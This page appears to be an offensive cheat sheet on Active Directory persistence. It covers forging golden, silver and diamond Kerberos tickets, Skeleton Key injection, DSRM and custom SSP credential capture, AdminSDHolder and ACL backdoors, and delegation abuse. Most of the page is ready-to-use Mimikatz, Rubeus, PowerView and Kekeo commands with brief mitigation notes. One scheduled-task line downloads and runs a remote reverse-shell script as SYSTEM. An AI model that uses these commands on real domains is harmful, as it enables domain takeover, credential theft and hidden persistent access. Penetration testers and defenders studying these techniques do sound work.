Persistence
Tool - SharPersist
Install Chrome Extension For Persistence
AD DS Persistence
Insomnihack 2024
Or in French - LeHack 2023:
Golden Tickets
krbtgt hash could be used to impersonate any user
It is recommended to change the password of krbtgt account twice as password history is maintained for the account
Mimikatz on DC to get krbt hash
Invoke-Mimikatz -Command '"lsadump::lsa /patch"' -ComputerName dcorp-dcInvoke-Mimikatz -Command '"lsadump::dcsync /user:domain\krbtgt"'DCSync (no code execution on the target DC) to get krbtgt hash
SafetyKatz.exe "lsadump::dcsync /user:dcorp\krbtgt" "exit"Create golden ticket
Using AES keys makes the attack more silent
From any machine connected with DC
Mimikatz
Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:domain.local /sid:<domain_sid> /aes256:<krbtgt_aes256_key> /startoffset:0 /endin:600 /renewmax:10080 /ptt"'BetterSafetyKatz
BetterSafetyKatz.exe "kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:<domain_sid> /aes256:<krbtgt_aes256_key> /startoffset:0 /endin:600 /renewmax:10080 /ptt" "exit"Rubeus
Rubeus.exe golden /aes256:<krbtgt_aes256_key> /sid:<domain_sid> /ldap /user:Administrator /printcmdMitigation
The following security control should be implemented to mitigate a Golden Ticket:
Change the KRBTGT password every 12 months, or when the domain has been compromised or suspected to have been compromised. Changing the KRBTGT password will invalidate any existing Golden Tickets that are being used.
To effectively change the KRBTGT user objectโs password hash, and invalidate any Golden Tickets, the KRBTGT password must be reset twice. This is because both the new and old KRBTGT passwords are stored by Domain Controllers such that authentication in the domain is not disrupted during a KRBTGT password change. When resetting the KRBTGT password, it is important to ensure that sufficient time is allowed between password resets to ensure the new password has had time to replicate to all Domain Controllers. For more information, see Microsoftโs guidance and PowerShell script to assist with resetting the KRBTGT password.
Silver Tickets
Whereas golden tickets are forged TGTs, silver tickets are forged service tickets (TGS) - Encrypted and signed by the hash of the service account (golden ticket is signed by the hash of krbtgt)
Ex 1 : Access to file system on the DC
Using AES key is more silent
BetterSafetyKatz.exe "kerberos::golden /User:Administrator /domain:domain.local /sid:<domain_sid> /target:dc.domain.local /service:CIFS /rc4:<rc4_key_service_account> /startoffset:0 /endin:600 /renewmax:10080 /ptt" "exit"Invoke-Mimikatz -Command "kerberos::golden /User:Administrator /domain:domain.local /sid:<domain_sid> /target:dc.domain.local /service:CIFS /rc4:<rc4_key_service_account> /startoffset:0 /endin:600 /renewmax:10080 /ptt" "exit"Can be use for other services: HOST, RPCSS, HTTP, etc.
List of SPN: https://adsecurity.org/?page_id=183
Ex: HTTP With Rubeus
Rubeus.exe silver /service:http/dc.domain.local /rc4:<rc4_key_service_account> /sid:<domain_sid> /ldap /user:Administrator /domain:domain.local /pttEx 2 : Achieve command execution using silver ticket
HOST SPN allow us to schedule a task on the target
BetterSafetyKatz.exe "kerberos::golden /User:Administrator /domain:domain.local /sid:<domain_sid> /target:dc.domain.local /service:HOST /rc4:<rc4_key_service_account> /startoffset:0 /endin:600 /renewmax:10080 /ptt" "exit"Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:domain.local /sid:<domain_sid> /target:dc.domain.local /service:HOST /rc4:<rc4_key_service_account> /startoffset:0 /endin:600 /renewmax:10080 /ptt"'Schedule and execute a task
schtasks /create /S dc.domain.local /SC weekly /RU "NT Authority\SYSTEM" /TN "STCheck" /TR "powershell.exe -c \"iex (New-Object Net-WebClient).DownloadString('http://IP/Invoke-PowershellTcp.ps1')\""
schtasks /Run /S dc.domain.local /TN "STCheck"Mitigation
The following security controls should be implemented to mitigate a Silver Ticket:
Create User objects with SPNs as group Managed Service Accounts (gMSAs). gMSAs have automatic password rotation, a 120-character password and simplified SPN management. These security features protect the password from being cracked, reducing the likelihood of a successful Silver Ticket. However, if creating user objects with SPNs as gMSAs is not feasible, set a minimum 30-character password that is unique, unpredictable and managed is set.
Change all computer object (including Domain Controller) passwords every 30 days. Malicious actors can establish persistence in Active Directory using a computer objectโs password; ensuring all computer object passwords (including Domain Controller passwords) are changed every 30 days can mitigate this persistence technique.
Ensure computer objects are not members of privileged security groups, such as the Domain Admins security group. If malicious actors obtain a computer objectโs password hash, then they gain any privileges the computer object has in the domain.
Ensure the Domain Computers security group does not have write or modify permissions to any objects in Active Directory. All computer objects are members of the Domain Computers security group. If this security group has rights over other objects, then malicious actors can use these rights to compromise other objects and potentially escalate their privileges and perform lateral movement.
Diamond Tickets
Decrypt a valid TGT, make changes to it and re-encrypt it using krbtgt account
Rubeus.exe diamond /krbkey:<aes_key_krbtgt> /user:target_username /password:target_password /enctype:aes /ticketuser:administrator /doamin:domain.local /dc:dc.domain.local /ticketuserid:500 /groups:512 /createonly:C:\Windows\System32\cmd.exe /show /ptt/tgtdeleg option in place of credentials in case we have access to a domain user
Rubeus.exe diamond /krbkey:<aes_key_krbtgt> /tgtdeleg /enctype:aes /ticketuser:administrator /doamin:domain.local /dc:dc.domain.local /ticketuserid:500 /groups:512 /createonly:C:\Windows\System32\cmd.exe /show /pttSkeleton Key
Patch a DC (lsass process) so that it allows access as any user with a single password
Skeleton Key is not opsec safe ad is known to caus issues with AD CS
Inject a skeleton key (password is mimikatz) on a DC.
Invoke-Mimikatz -Command '"privilege::debug" "misc::skeleton"' -ComputerName dc.domain.localNow, we can access any machine with a valid username and password as "mimikatz"
Enter-PSSession -Computername dc -Credential domain\AdministratorIn case lsass is running as a protected process, we need mimidriv.sys on disk of the target DC
Very noisy in logs - Service installation (Kernel mode driver)
mimikatz# privilege::debug
mimikatz# !+
mimikatz# !processprotect /process:lsass.exe /remove
mimikatz# misc::skeleton
mimikatz# !-Modify the default key
https://github.com/gentilkiwi/mimikatz/blob/master/mimikatz/modules/kuhl_m_misc.c#L611
For example, to use "S3c3rtP@ss", compute its RC4 and split it into 8 bytes stubs:
56aa742a
6bebb9ca
62fc9f70
a2e00cd3Reverse the values by 2 bytes
2a74aa56
cab9eb6b
709ffc62
d30ce0a2Prepend 0x to each and modify kiwikey array value in the code linked above
DWORD kiwiKey[] = {0x2a74aa56, 0xcab9eb6b, 0x709ffc62, 0xd30ce0a2}Mitigation
The following security controls should be implemented to mitigate Skeleton Key:
Limit access to Domain Controllers to only privileged users that require access. This reduces the number of opportunities for malicious actors to gain access to Domain Controllers.
Restrict privileged access pathways to Domain Controllers to jump servers and secure admin workstations using only the ports and services that are required for administration. Domain Controllers are classified as โTier 0โ assets within Microsoftโs โEnterprise Access Modelโ.
Run the LSASS process in protected mode. This makes it more difficult to override the LSASS process, which is required for Skeleton Key to succeed.
Implement Microsoftโs vulnerable driver blocklist. Restricting known malicious or vulnerable drivers on Domain Controllers makes it more difficult for malicious actors to bypass LSASS protection.
Restrict driver execution to an approved set. Restricting the drivers that can be loaded on Domain Controllers to an approved set hardens it against attempts to bypass LSASS protection. This can be achieved through application control solutions, including Microsoftโs Windows Defender Application Control.
Only use Domain Controllers for AD DS and do not install any non-security-related services or applications. This reduces the attack surface of Domain Controllers as there are fewer services, ports and applications that may be vulnerable and used to compromise a Domain Controller.
Centrally log and analyse Domain Controller logs in a timely manner to identify malicious activity. Domain Controller logs provide a rich source of information that is important for investigating potentially malicious activity on Domain Controllers and in the domain.
Disable the Print Spooler service on Domain Controllers. For example, malicious actors have targeted the Print Spooler service on Domain Controllers as a technique to authenticate to a system they control to collect the Domain Controllers computer object password hash or TGT. Malicious actors can then use this to authenticate to the Domain Controller they coerced and gain administrative access.
DSRM - Directory Services Restore Mode
There is a local admin "Administrator" on every DC whose password is DSRM. DSRM password is required when a server is promoted to DC and it is rarely changed
Dump DSRM password - DA privileges needed
Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"' -Computername dcCompare the Administrator hash with the Administrator hash of below command
Invoke-Mimikatz -Command '"lsadump::lsa /patch"' -Computername dcLogon Behavior for the DSM account needs to be changed before passing the hash
Enter-PSSession -Computername dc
New-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa" -Name "DsrmAdminLogonBehavior" -Value 2 -PropertyType DWORDor
Invoke-Command -ComputerName dc -ScriptBlock {
New-ItemProperty "HKLM:\System\CurrentControlSet\Control\Lsa" -Name "DsrmAdminLogonBehavior" -Value 2 -PropertyType DWORD
}Pass the hash
Invoke-Mimikatz -Command '"sekurlsa::pth /domain:dc.domain.local /user:Administrator /ntlm:<dsrm_hash> /run:powershell.exe"'
ls \\dc\C$To use PSRemoting, we must force NTLM authentication:
Enter-PSSession -ComputerName dc -Authentication NegotiateCustom SSP
Security Support Provider is a DLL which provides ways for an application to obtain an authenticated session. Ex: NTLM, Kerberos, Wdigest, CredSSP
Mimikatz mimilib.dll is a custom SSP that logs local logons, service account and machine account passwords in clear text on the target server
All local logons on the DC are logged to C:\Windows\system32\mimilsa.log or C:\Windows\system32\kiwissp.log
Way 1
Drop mimilib.dll to system32 and add mimilib to HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages
$packages = Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\ -Name 'Security Packages' | select -ExpandProperty 'Security Packages'
$packages += "mimilib"
Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\ -Name 'Security Packages' -Value $packages
Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\ -Name 'Security Packages' -Value $packagesWay 2
Inject into lsass
Not stable with Server 2019 and Server 2022
Invoke-Mimikatz -Command '"misc::memssp"'AdminSDHolder
Security Descriptor Propagator (SDPROP) runs every hour and compares the ACL of protected groups and members with the ACL of AdminSDHolder and any differences are overwritten on the object ACL
Well Known abuse of Protected Groups
https://www.ossir.org/paris/supports/2017/2017-04-11/2017-04-11_Active_directory_v2.5.pdf
Account Operators
Can modify DA/EA/BA groups. Can modify nested groups within these groups
Backup Operators
Backup GPO, edit to add SID of controlled account to a privileged group and Restore
Server Operators
Run a command as system (using the disabled Browser service)
Print Operators
Copy ntd.dit backup, load device drivers
Add FullPermissions to a user
With DA privs, AdminSDHolder can be used as a backdoor/persistence mechanisme by adding a user with Full Permissions to the AdminSDHolder object
With PowerView
Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC=domain,DC=local' -PrincipalIdentity username -Rights All -PrincipalDomain domain.local -TargetDomain domain.local -VerboseWith AD Module and RACE toolkit
Set-DCPermissions -Method AdminSDHolder -SAMAccountName username -Right GenericAll -DistinguishedName 'CN=AdminSDHolder,CN=System,DC=domain,DC=local' -VerboseOther permissions: ResetPassword, WriteMembers
Add-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC=domain,DC=local' -PrincipalIdentity username -Rights ResetPassword -PrincipalDomain domain.local -TargetDomain domain.local -VerboseAdd-DomainObjectAcl -TargetIdentity 'CN=AdminSDHolder,CN=System,DC=domain,DC=local' -PrincipalIdentity username -Rights WriteMembers -PrincipalDomain domain.local -TargetDomain domain.local -VerboseRun SDProp manually
Invoke-SDPropagator -timeoutMinutes 1 -showProgress -VerboseFor pre-Server 2008:
Invoke-SDPropagator -taskname FixUpInheritance -timeoutMinutes 1 -showProgress -VerboseCheck Domain Admins permission
PowerView
get-DomainObjectAcl -Identity 'Domain Admins' -ResolveGUIDs | ForEach-Object {$_ | Add-Member NoteProperty 'IdentityName' $(Convert-SidToName $_.SecurityIdentifier);$_} | ?{$_.IdentityName -matche "username}AD Module
(Get-Acl -Path 'AD:\C:\CN=Domain Admins,CN=Users,DC=domain,DC=local').Access | ?{$_.IdentityReference -match 'username'}Exploit
FullControl
PowerView
Add-DomainGroupMember -Identity 'Domain Admins' -Members testda -VerboseAD Module
Add-ADGroupMember -Identity 'Domain Admins' -Members testdaResetPassword
PowerView
Set-DomainUserPassword -Idenity testda -AccountPassword (ConvertTo-SecureString "Password@123" -AsPlainText -Force) -VerboseAD Module
Set-ADAccountPassword -Identity testda -NewPassword (ConvertTo-SecureString "Password@123" -AsPlainText -Force) -VerboseRights Abuse
With DA privs, the ACL for the domain root can be modified to provide rights like FullControl or the ability to run DCSync
FullControl
Add FullControl rights:
With PowerView
Add-DomainObjectAcl -TargetIdentity 'DC=domain,DC=local' -PrincipalIdentity username -Rights All -PrincipalDomain domain.local -TargetDomain domain.local -VerboseWith AD Module and RACE toolkit
https://github.com/samratashok/RACE
Set-ADCL -SAMAccountName username -Right GenericAll -DistinguishedName 'DC=domain,DC=local' -VerboseDCSync
Add rights for DCSync:
With PowerView
Add-DomainObjectAcl -TargetIdentity 'DC=domain,DC=local' -PrincipalIdentity username -Rights DCSync -PrincipalDomain domain.local -TargetDomain domain.local -VerboseWith AD Module and RACE toolkit
https://github.com/samratashok/RACE
Set-ADCL -SAMAccountName username -GUIDRight DCSync -DistinguishedName 'DC=domain,DC=local' -VerboseExecute DCSync
DCSyncInvoke-Mimikatz -Command '"lsadump::dcsync /user:domain\krbtgt"'SafetyKatz.exe "lsadump::dcsync /user:domain\krbtgt" "exit"Security Descriptors
Modify Security Descriptors of multiple remote access methods to allow access to non-admin users. Admin privs are required
With RACE toolkit: https://github.com/samratashok/RACE
WMI
On local machine for user1
Set-RemoteWMI -SamAccoutName user1 -VerboseOn remote machine for user1 without explicit credentials
Set-RemoteWMI -SamAccoutName user1 -ComputerName dc -namespace 'root\cimv2' -VerboseOn remote machine with explicit credentials
Set-RemoteWMI -SamAccoutName user1 -ComputerName dc -Credential Administrator -namespace 'root\cimv2' -VerboseOn remote machine remove permissions
Set-RemoteWMI -SamAccoutName user1 -ComputerName dc -namespace 'root\cimv2' -Remove -VerbosePS Remoting backdoor
Not stable after August 2020 patches
On local machine for user1
Set-RemotePSRemoting -SamAccoutName user1 -VerboseOn remote machine for user1 without explicit credentials
Set-RemotePSRemoting -SamAccoutName user1 -ComputerName dc -VerboseOn remote machine, remove permissions
Set-RemotePSRemoting -SamAccoutName user1 -ComputerName dc -RemoveRemote Registry
With DAMP
Add-RemoteRegBackdoor -ComputerName dc -Trustee user1 -VerboseAs user1, retrieve machine account hash
Get machine account hash for silver ticket attack
Get-RemoteMachineAccountHash -ComputerName dc -VerboseRetrieve local account hash
Get-RemoteLocalAccountHash -ComputerName dc -VerboseRetrieve domain cached credentials
Get-RemoteCachedCredential -ComputerName dc -VerbosemsDS-AllowedToDelegateTo
SeEnableDelegationPrivilege on the DC and full rights on the target user - default for Domain Admins and Enterprise Admins
With Powershell
# PowerView
Set-DomainObject-Identity devuser -Set @{serviceprincipalname='dev/svc'}
Set-DomainObject-Identity devuser -Set @{"msds-allowedtodelegateto"="ldap/dc.domain.local"}
Set-DomainObject-SamAccountName devuser -Xor @{"useraccountcontrol"="16777216"}
Get-DomainUser โTrustedToAuth
# AD Module
Set-ADUser -Identity devuser -ServicePrincipalNames @{Add='dev/svc'}
Set-ADUser -Identity devuser Add @{@{'msDS AllowedToDelegateTo' = @('ldap/dc', 'ldap/dc.domain.local)} -Verbose
Set-ADAccountControl-Identity devuser -TrustedToAuthForDelegation $true
Get-ADObject -Filter {msDS-AllowedToDelegateTo -ne "$null"} -Properties msDS-AllowedToDelegateTo
With Kekeo
kekeo# tgt::ask /user:devuser /domain:domain.local /password:Sup3rPassword!
kekeo# tgs::s4u /tgt:TGT_devuser@domain.local_krbtgt~domain.local@domain.local.kirbi /user:Administrator@domain.local /service:ldap/dc.domain.local
Invoke-Mimikatz -Command '"kerberos::ptt TGS_Administrator@domain.local@domain.local_ldap~dc.domain.local@domain.local.kirbi"'
Invoke-Mimikatz -Command '"lsadump::dcsync /user:domain\krbtgt"'With Rubeus
# Get RC4 hash
Rubeus.exe hash /password:Sup3rPassword! /user:devuser /domain:domain.local
Rubeus.exe s4u /user:devuser /rc4:<rc4_hash> /impersonateuser:administrator /msdsspn:ldap/dc.domain.local /domain:domain.local /ptt
SafetyKatz.exe "lsadump::dcsync /user:domain\krbtgt" "exit"Persistence in Linux
Last updated